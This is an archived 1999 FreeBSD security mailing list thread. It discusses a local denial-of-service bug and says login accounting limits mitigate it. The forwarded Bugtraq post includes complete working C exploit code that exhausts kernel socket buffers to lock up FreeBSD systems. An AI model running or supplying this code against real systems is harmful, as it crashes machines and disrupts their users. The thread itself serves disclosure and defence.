Date: Wed, 1 Sep 1999 11:49:41 -0600 (MDT) From: FreeBSD -- The Power to Serve <geniusj@free-bsd.org> To: Jeff Wheat <jeff@cetlink.net> Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD Message-ID: <Pine.BSF.4.10.9909011149020.18938-100000@free-bsd.org> In-Reply-To: <XFMail.990901123306.jeff@cetlink.net>
next in thread | previous in thread | raw e-mail | index | archive | help
If you have public access users, you should have login accounting in the
first place.. and yes, it does stop it :).. I verified this on a 3.2 box
with my login accounting setup..
On Wed, 1 Sep 1999, Jeff Wheat wrote:
> I have just verified that this code will indeed crash the following
> systems:
>
> Intel: 2.2.2, 2.2.6, 2.2.7, 2.2.8, 3.0, 3.1
>
> Alpha: 4.0-19990809-SNAP
>
>
> Regards,
> Jeff
>
> -----FW: <Pine.LNX.4.10.9908270039010.16315-100000@thetis.deor.org>-----
>
> Date: Fri, 27 Aug 1999 00:43:47 -0400
> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
> From: "L. Sassaman" <rabbi@QUICKIE.NET>
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: Local DoS in FreeBSD
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> This was first posted to the FreeBSD security list on the 9th of August,
> subsequently discussed on freebsd-stable and freebsd-hackers... no one
> seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x
> machines consistantly. I have also been told that it affects NetBSD and
> OpenBSD, though I haven't confirmed it.
>
> Someone with the know-how care to fix?
>
>
>
> L. Sassaman
>
> System Administrator | "Even the most primitive society has
> Technology Consultant | an innate respect for the insane."
> icq.. 10735603 |
> pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke
>
>
> - ---
>
>
> #include <unistd.h>
> #include <sys/socket.h>
> #include <fcntl.h>
>
> #define BUFFERSIZE 204800
>
> extern int
> main(void)
> {
> int p[2], i;
> char crap[BUFFERSIZE];
>
> while (1)
> {
> if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> break;
> i = BUFFERSIZE;
> setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> fcntl(p[0], F_SETFL, O_NONBLOCK);
> fcntl(p[1], F_SETFL, O_NONBLOCK);
> write(p[0], crap, BUFFERSIZE);
> write(p[1], crap, BUFFERSIZE);
> }
>
> return(0);
> }
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v0.9.10 (GNU/Linux)
> Comment: OpenPGP Encrypted Email Preferred.
>
> iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91
> TkVIqNdQpRi8CK9vySilouE=
> =7ufs
> -----END PGP SIGNATURE-----
>
> --------------End of forwarded message-------------------------
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.10.9909011149020.18938-100000>
